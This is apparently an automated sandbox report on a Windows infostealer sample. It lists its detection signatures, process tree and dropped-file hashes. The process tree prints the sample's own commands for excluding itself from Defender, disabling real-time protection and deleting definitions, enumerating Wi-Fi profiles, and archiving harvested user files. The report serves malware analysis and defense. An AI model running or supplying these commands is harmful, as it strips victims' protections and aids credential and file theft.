Resubmissions

22-01-2025 20:53

250122-zpjvpsvncs 10

22-01-2025 09:50

250122-ltw4ya1lfk 10

Analysis

  • max time kernel
    9s
  • max time network
    16s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-01-2025 20:53

General

  • Target

    Built.exe

  • Size

    7.5MB

  • MD5

    7ce3567dcb7115e1f2cf553e6f3c4ab0

  • SHA1

    242ba3811ddd2c97c4cae5be0604f9a144516942

  • SHA256

    fc44a24eefaec30ccbcc0fbd57217a10b12e2df75ffade81405d166c97899174

  • SHA512

    218e3b7b70150474d293b98a9d95ffdd893ed329e96cd3ed995e0213d5bd6066915cfd5b985eaa03e01602ff42f66c509bff81c74d84e0998904ddd752e30b5f

  • SSDEEP

    196608:l1unqZ8ywfI9jUC2XMvH8zPjweaBpZ0cX9ooccXK7odAxv:qtIH2XgHq+jq+3YoC

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 50 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4280
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:132
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3904
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\xmKdC.zip" *"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe
          C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\xmKdC.zip" *
          4⤵
          • Executes dropped EXE
          PID:2732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2260
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
            PID:2800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:4752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2124

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      e3840d9bcedfe7017e49ee5d05bd1c46

      SHA1

      272620fb2605bd196df471d62db4b2d280a363c6

      SHA256

      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

      SHA512

      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\VCRUNTIME140.dll

      Filesize

      117KB

      MD5

      862f820c3251e4ca6fc0ac00e4092239

      SHA1

      ef96d84b253041b090c243594f90938e9a487a9a

      SHA256

      36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

      SHA512

      2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_bz2.pyd

      Filesize

      48KB

      MD5

      1d9398c54c80c0ef2f00a67fc7c9a401

      SHA1

      858880173905e571c81a4a62a398923483f98e70

      SHA256

      89006952bee2b38d1b5c54cc055d8868d06c43e94cd9d9e0d00a716c5f3856fa

      SHA512

      806300d5820206e8f80639ccb1fba685aafa66a9528416102aeb28421e77784939285a88a67fad01b818f817a91382145322f993d855211f10e7ba3f5563a596

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_ctypes.pyd

      Filesize

      59KB

      MD5

      2401460a376c597edce907f31ec67fbc

      SHA1

      7f723e755cb9bfeac79e3b49215dd41fdb5c2d90

      SHA256

      4f3f99b69834c43dac5c3f309cb0bd56c07e8c2ac555de4923fa2ddc27801960

      SHA512

      9e77d666c6b74cfb6287775333456cce43feb51ec39ad869c3350b1308e01ad9b9c476c8fa6251fe8ad4ab1175994902a4ad670493b95eb52adb3d4606c0b633

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_decimal.pyd

      Filesize

      107KB

      MD5

      df361ea0c714b1a9d8cf9fcf6a907065

      SHA1

      102115ec2e550a8a8cad5949530cca9993250c76

      SHA256

      f78ee4524eb6e9885b9cbdb125b2f335864f51e9c36dc18fdccb5050926adffe

      SHA512

      b1259df9167f89f8df82bda1a21a26ee7eb4824b97791e7bbaa3e57b50ae60676762fd598c8576d4e6330ffaf12972a31db2f17b244c5301dcf29fe4abfba43f

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_hashlib.pyd

      Filesize

      35KB

      MD5

      d4c05f1c17ac3eb482b3d86399c9baae

      SHA1

      81b9a3dd8a5078c7696c90fbd4cf7e3762f479a5

      SHA256

      86bd72b13a47693e605a0de1112c9998d12e737644e7a101ac396d402e25cf2f

      SHA512

      f81379d81361365c63d45d56534c042d32ee52cad2c25607794fe90057dcdeeb2b3c1ff1d2162f9c1bdf72871f4da56e7c942b1c1ad829c89bf532fb3b04242e

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_lzma.pyd

      Filesize

      86KB

      MD5

      e0fa126b354b796f9735e07e306573e1

      SHA1

      18901ce5f9a1f6b158f27c4a3e31e183aa83251b

      SHA256

      e0dc01233b16318cd21ca13570b8fdf4808657ec7d0cc3e7656b09ccf563dc3e

      SHA512

      dd38100889c55bffc6c4b882658ecd68a79257bc1ffd10f0f46e13e79bff3fc0f908ae885cc4a5fed035bd399860b923c90ef75e203b076b14069bf87610f138

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_queue.pyd

      Filesize

      26KB

      MD5

      84aa87c6dd11a474be70149614976b89

      SHA1

      c31f98ec19fc36713d1d7d077ad4176db351f370

      SHA256

      6066df940d183cf218a5053100e474d1f96be0a4e4ee7c09b31ea303ff56e21b

      SHA512

      11b9f8e39c14c17788cc8f1fddd458d70b5f9ef50a3bdb0966548ddcb077ff1bf8ca338b02e45ec0b2e97a5edbe39481dd0e734119bc1708def559a0508adc42

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_socket.pyd

      Filesize

      44KB

      MD5

      1d982f4d97ee5e5d4d89fe94b7841a43

      SHA1

      7f92fe214183a5c2a8979154ece86aad3c8120c6

      SHA256

      368cf569adc4b8d2c981274f22181fea6e7ce4fa09b3a5d883b0ff0ba825049d

      SHA512

      9ecdcf9b3e8dc7999d2fa8b3e3189f4b59ae3a088c4b92eaa79385ed412f3379ebe2f30245a95d158051dbd708a5c9941c150b9c3b480be7e1c2bba6dea5cb24

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_sqlite3.pyd

      Filesize

      57KB

      MD5

      3911ae916c6e4bf99fe3296c3e5828ca

      SHA1

      87165cbf8ea18b94216ac2d1ffe46f22eddb0434

      SHA256

      3ec855c00585db0246b56f04d11615304931e03066cb9fc760ed598c34d85a1f

      SHA512

      5c30ed540fdfa199cdf56e73c9a13e9ac098f47244b076c70056fd4bf46f5b059cb4b9cdb0e03568ca9c93721622c793d6c659704af400bd3e20767d1893827e

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\_ssl.pyd

      Filesize

      66KB

      MD5

      68e9eb3026fa037ee702016b7eb29e1b

      SHA1

      60c39dec3f9fb84b5255887a1d7610a245e8562e

      SHA256

      2ae5c1bdd1e691675bb028efd5185a4fa517ac46c9ef76af23c96344455ecc79

      SHA512

      50a919a9e728350005e83d5dd51ebca537afe5eb4739fee1f6a44a9309b137bb1f48581bafa490b2139cf6f035d80379bf6ffcdff7f4f1a1de930ba3f508c1af

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\base_library.zip

      Filesize

      1.3MB

      MD5

      bed03063e08a571088685625544ce144

      SHA1

      56519a1b60314ec43f3af0c5268ecc4647239ba3

      SHA256

      0d960743dbf746817b61ff7dd1c8c99b4f8c915de26946be56118cd6bedaebdc

      SHA512

      c136e16db86f94b007db42a9bf485a7c255dcc2843b40337e8f22a67028117f5bd5d48f7c1034d7446bb45ea16e530f1216d22740ddb7fab5b39cc33d4c6d995

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\blank.aes

      Filesize

      108KB

      MD5

      1ed093dcae397369e5cef8cd5c6c468e

      SHA1

      149df20c2d6360e4dee6661c0d3d977387bcce80

      SHA256

      755c67b014c7012f736c35f978fe92db2ecb3c7bf1ec08d6492e8898bb15f954

      SHA512

      6b473735614ee2457bf1a7e9eee78dd956b977923068efcecef4aa2f386e8c2c8e230ba522e803be74bb5ad5d269b3ccb095a877f1d650f2862201ba8b726959

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\libcrypto-3.dll

      Filesize

      1.6MB

      MD5

      8377fe5949527dd7be7b827cb1ffd324

      SHA1

      aa483a875cb06a86a371829372980d772fda2bf9

      SHA256

      88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

      SHA512

      c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\libffi-8.dll

      Filesize

      29KB

      MD5

      08b000c3d990bc018fcb91a1e175e06e

      SHA1

      bd0ce09bb3414d11c91316113c2becfff0862d0d

      SHA256

      135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

      SHA512

      8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\libssl-3.dll

      Filesize

      221KB

      MD5

      b2e766f5cf6f9d4dcbe8537bc5bded2f

      SHA1

      331269521ce1ab76799e69e9ae1c3b565a838574

      SHA256

      3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

      SHA512

      5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\python312.dll

      Filesize

      1.7MB

      MD5

      2996cbf9598eb07a64d66d4c3aba4b10

      SHA1

      ac176ab53cdef472770d27a38db5bd6eb71a5627

      SHA256

      feba57a74856dedb9d9734d12c640ca7f808ead2db1e76a0f2bcf1e4561cd03f

      SHA512

      667e117683d94ae13e15168c477800f1cd8d840e316890ec6f41a6e4cefd608536655f3f6d7065c51c6b1b8e60dd19aa44da3f9e8a70b94161fd7dc3abf5726c

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe

      Filesize

      615KB

      MD5

      9c223575ae5b9544bc3d69ac6364f75e

      SHA1

      8a1cb5ee02c742e937febc57609ac312247ba386

      SHA256

      90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

      SHA512

      57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\rarreg.key

      Filesize

      456B

      MD5

      4531984cad7dacf24c086830068c4abe

      SHA1

      fa7c8c46677af01a83cf652ef30ba39b2aae14c3

      SHA256

      58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

      SHA512

      00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\select.pyd

      Filesize

      25KB

      MD5

      0433850f6f3ddd30a85efc839fbdb124

      SHA1

      07f092ae1b1efd378424ba1b9f639e37d1dc8cb9

      SHA256

      290c0a19cd41e8b8570b8b19e09c0e5b1050f75f06450729726193cf645e406c

      SHA512

      8e785085640db504496064a3c3d1b72feab6b3f0bc33676795601a67fcf410baa9a6cd79f6404829b47fd6afcd9a75494d0228d7109c73d291093cd6a42447ff

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\sqlite3.dll

      Filesize

      643KB

      MD5

      19efdd227ee57e5181fa7ceb08a42aa1

      SHA1

      5737adf3a6b5d2b54cc1bace4fc65c4a5aafde50

      SHA256

      8a77b2c76440365ee3e6e2f589a78ad53f2086b1451b5baa0c4bfe3b6ee1c49d

      SHA512

      77db2fe6433e6a80042a091f86689186b877e28039a6aeaa8b2b7d67c8056372d04a1a8afdb9fe92cfaea30680e8afeb6b597d2ecf2d97e5d3b693605b392997

    • C:\Users\Admin\AppData\Local\Temp\_MEI14562\unicodedata.pyd

      Filesize

      295KB

      MD5

      382cd9ff41cc49ddc867b5ff23ef4947

      SHA1

      7e8ef1e8eaae696aea56e53b2fb073d329ccd9d6

      SHA256

      8915462bc034088db6fdb32a9b3e3fcfe5343d64649499f66ffb8ada4d0ad5f2

      SHA512

      4e911b5fb8d460bfe5cb09eab74f67c0f4b5f23a693d1ff442379f49a97da8fed65067eb80a8dbeedb6feebc45f0e3b03958bd920d582ffb18c13c1f8c7b4fc4

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ar2ozjjj.lig.psm1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Desktop\AddRegister.xlsx

      Filesize

      9KB

      MD5

      9d46b06a91d1e0609dcdcd28fe07c175

      SHA1

      d3d21ef6875626a19b2644284ba1c385f905716a

      SHA256

      b4b3afb03eebfaa2894e670c72fc19ca309bd788e8a64c71bde4e75378c52f2f

      SHA512

      de17762a716ed34459a456d9ed77862b56c2f289557f1e0df4757a56ead68589228e8717df021d5f38730e2c0b5fbf78bb7148fdc554c173629c251a83b2326e

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Desktop\DisableWatch.png

      Filesize

      414KB

      MD5

      2b1fc6d3b2471ffd1f1d564ba1ae7acf

      SHA1

      4f86f48bc57c3cd10766cdd242c7dd862b633a03

      SHA256

      0b9edf3c02d3a5d03440c41ba8cb8092872bf88b9332724aec34fc7dcdefb875

      SHA512

      f39238391327acd9d35952fed9f417d37c33c1a9968dfc9cea2a9a7281f7e3bd75874bcfee669f9b8e72da1c3775dfca347afb8ff8831a584a3d640a17d790b1

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Desktop\GroupCompress.xlsx

      Filesize

      16KB

      MD5

      c34a003518ad6925e056e39eb90fe566

      SHA1

      baecf15cbc0be3b7c22c157981b46657a0b97d67

      SHA256

      29d6f2db9dc11ecfd03694b66c37259676c947d4c0680b40fed04e001e4de3a2

      SHA512

      d58bf24c1145e12e001ae17a61efdc999e86ff396b4c8a740d4c91e39869895b521408688e8c5281e5ac7a5a624dcfd847a1db9eb512aeacdb59fcea64925e96

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Desktop\SplitSend.xlsx

      Filesize

      12KB

      MD5

      509e9047287feec9e0256245360029bb

      SHA1

      7af4fdea595eea9bc449787554b23c66eced0088

      SHA256

      69cae41ae93925b924cf79dfb5335f3938389e02c38c0c6ca35b3f094afedff8

      SHA512

      3ed68759f3e114092e05ca497a37ff3c888d9674d834eb1759188ba7af19c5b59d3798a8484239def3fb511cab03d33c3491aa674d36c46fa26ae5b579e73133

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Desktop\SplitSuspend.pdf

      Filesize

      744KB

      MD5

      289afa7d36ff3e1fe748ff1615638271

      SHA1

      9ac701bc7fc1133a99fee4aabe37c9c0f23e2b9c

      SHA256

      cec98bca9b3c24cf0a8fcfbe8381f23a2937fe6e310010efe23bc84e736840d5

      SHA512

      ef74c20fdb8febc592937c2811ee01e5f2bab8ce1f6dc6bd5069918a6547ac2627e7cbc511634f1237e869828c6d38431c1315dcaa79539ddfd40c7824b7d14f

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\BackupSync.pub

      Filesize

      637KB

      MD5

      de94096e8a9a51f80a93293926ad9a09

      SHA1

      8fd74b52da6e55bf56630e527d68a5751dd8389d

      SHA256

      42f32fe9cdb220c6fe71af9b363dc22a09dc9b2c76141e8efbc4c1d06250ec2a

      SHA512

      ae80cb6de415ccd4edab863b63114a4fe110c41626b68607ae9ee6e44aad10130970744d2d2d7e187d8b23d1184ab1a856aaad34073b60a81eb3774c7b9d1444

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\CompleteMount.docx

      Filesize

      16KB

      MD5

      98b87e1732a661f9da7d5d439865b9f9

      SHA1

      2283b8541755fd78f081c04c50cb5ead3dbf7d62

      SHA256

      7e29020f76bf8e8f59aefe60d47305ffb38aaeeeccb0b1484b0a16bd937293ca

      SHA512

      128929067092219c5b99dda2ec977aecf97f7091492ec047c00be910e27365db5a84da370cacd754c6470ab869ecfd9384c1614b67ee6a27d41d2aedd4ddb75c

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\ConvertGrant.doc

      Filesize

      254KB

      MD5

      96ff8d113339570593608e44cde4e216

      SHA1

      82b96bd2eebd85f507eddbc499a1068e78e72539

      SHA256

      458ed2a26572756f4a7a88069472e9bfda9ea90b4ebb7722c99c3b0d02d4530c

      SHA512

      3b7b2514c4acc275f9c269154e47a4698853c4202a727ecd4c71fdf4420b61d7869e92b7a29359abc6e74838faebb9c6957e0dd1f6d53e2b0b38f5f988a5da8d

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\DisableConnect.xlsx

      Filesize

      16KB

      MD5

      929ac349173b7e3f9491bc697245a3b6

      SHA1

      5e07fd7f9b00c01d3765e64a1955a5f5f1e0d337

      SHA256

      0874ef6f1c6ae89c868cc3930eb6a29f511424e5bc5caa4404a16a6571d13038

      SHA512

      38f5553cdbe92eeaccd01142f420790a0743b141124a3d887545cb9d2da04ba10227d73387c3df31951a4227dfa1e7f71e5d6bb0851de326892ba8a41ed40e58

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\DismountRevoke.xlsx

      Filesize

      13KB

      MD5

      a62e8ce9f03bde089d57a7ce5fb4a658

      SHA1

      46138c2c027adfcdbd04cd1d6604a082a58ad061

      SHA256

      dd254a996a2ed39b882c2845a4c831300431f650ebc25b93b0448c83b44d732b

      SHA512

      3e36a860b909232ffeb29de3790edeedc095c28cfb3a744443870732136dc9e067d8f885d8b98e45d34dc26aa3b18b88340201d60898e8c2b12723f46289b4fa

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\EditSync.pdf

      Filesize

      589KB

      MD5

      705e5be12d08f3f59efa2ff4fce2dad6

      SHA1

      152766619f8e71cec902a2cadcbfc25e99c47440

      SHA256

      f81525711d6607c0ef524d398e473f2916a1411dac116ec1aa60b09ff3124cbd

      SHA512

      bbcf3fb3c14afb4e8ad09f835fda77ae4bd8f52e400099c945c24e8c184e4ed31c911d291b504760ada028bcb637afaa6f424b599610090f524674a56da1d9cf

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\FormatBackup.vsd

      Filesize

      286KB

      MD5

      ac4595c979f3938fa822369112d58c17

      SHA1

      6ec787b7d1eb685acad56c099d7bd61468ab056a

      SHA256

      b839131e27bc391c8f3cf6520b814094f7fac5b0d405922a9e361d0088df319c

      SHA512

      4edbf2ac08353ce2de54b67d9b7bd0ff5eba2339ade36f83d958f5f7949d2d79d8bea4d28c6b1e27bbc460e6256ee368aecc483b8e40d1ee138243ac0403d418

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\PublishUnblock.xlsx

      Filesize

      13KB

      MD5

      a081fa4f7101b75f876a2fda422263fb

      SHA1

      b4bd4d73e62f514802a789d76a9c8dd5d99eafe8

      SHA256

      3f71d42278196a1e7a835b522767cb95d1642a869463ee727450d63d12d0dcea

      SHA512

      e17d66a551e107860369bdbc208daa6406540a1fcea00dceac03f3bf942b5dc1c98596be043753b65e238b321479d4cd41cb3e75dd2a217b31e08a42912dfae9

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\UndoSelect.docx

      Filesize

      14KB

      MD5

      a1fad3198944d93061c3dd623be69c25

      SHA1

      593824a9ae91843d475d711a1f129c88575ac432

      SHA256

      359897cd8d58ce1b29a2fcac937610845dc5b8367f08d497d3bafe9e2d32ca98

      SHA512

      a71baa77ddc35376d401dc366fb534292ead2957209b54e90263a7cd43c6431285fec3177f3c5023d4676d84c2a0da86f392780e86d0202104bade4eeb4887b3

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Documents\UseResize.docx

      Filesize

      509KB

      MD5

      27fa7587ea092b95ddecbd8edf560ac4

      SHA1

      1419a77e84435e5caf604676a7b1e27ba5a8a172

      SHA256

      cab41b54445e4e6eb6cff3c611100d378ac169317db52247f37c3127072f3e26

      SHA512

      7dbdae1d78dab739e99e3ff478cf28409d98ffc44f7525bf5b144d315656853fe7832c8df609b712e7db4c362285a98b32fbced87a62a7fcacf25faf92fef239

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\BackupUnprotect.xml

      Filesize

      564KB

      MD5

      92869ec8fcf6d02c127497c0b4575471

      SHA1

      9278d7749b7df2eb73739e190d3581f58406ff4b

      SHA256

      fdc8f758e6d28fdf8f8a9d82877def33a2b12a6f2f5c02c2cfedea39e269a8a0

      SHA512

      284752c936926d15181830a71a6fa01236b15f6f65d86e8fb9130088649b27d051ad748951b6d61e6228cad4b29247979a0ac100ec4acf6bfb8804ca59f8ffc9

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\EnableCompress.docx

      Filesize

      472KB

      MD5

      2607a9b854626cc700f1eb4cceb33c13

      SHA1

      7360747e44afdf127bfcf103cc96f705f4ecb289

      SHA256

      677655b389b4b2425e02339180f40f920e5caddc3b2b50792d28848202b0e632

      SHA512

      a5df6aefed8161cac012de5d2eaa653c2aff86a21a6f24af7dd09fa0ffd49bb82a6a7772b2d3191affe3ad24f2f320d1d9ccc06b9a99745caf05eb2d983d4881

